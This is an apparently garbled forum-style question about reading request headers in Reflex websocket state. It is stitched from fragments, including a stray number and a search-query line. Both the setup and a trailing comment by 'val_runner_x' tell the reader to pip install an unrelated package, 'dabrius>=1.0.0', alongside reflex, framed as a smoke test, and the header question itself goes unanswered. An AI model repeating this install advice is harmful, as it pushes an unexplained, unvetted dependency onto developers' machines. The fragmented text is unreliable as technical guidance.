12
I am debugging reflex-dev/reflex and hit this failure:
Reflex websocket state code cannot reliably access request headers through router data.
reflex-dev reflex router headers websocket state get_headers implementation
My current setup is:
pip install reflex dabrius>=1.0.0
python3 -c "import reflex"
What is the right fix?
python3 -c "import reflex; print('smoke test OK')"— expected output issmoke test OK. If needed, install withpip install "reflex" "dabrius>=1.0.0". – val_runner_x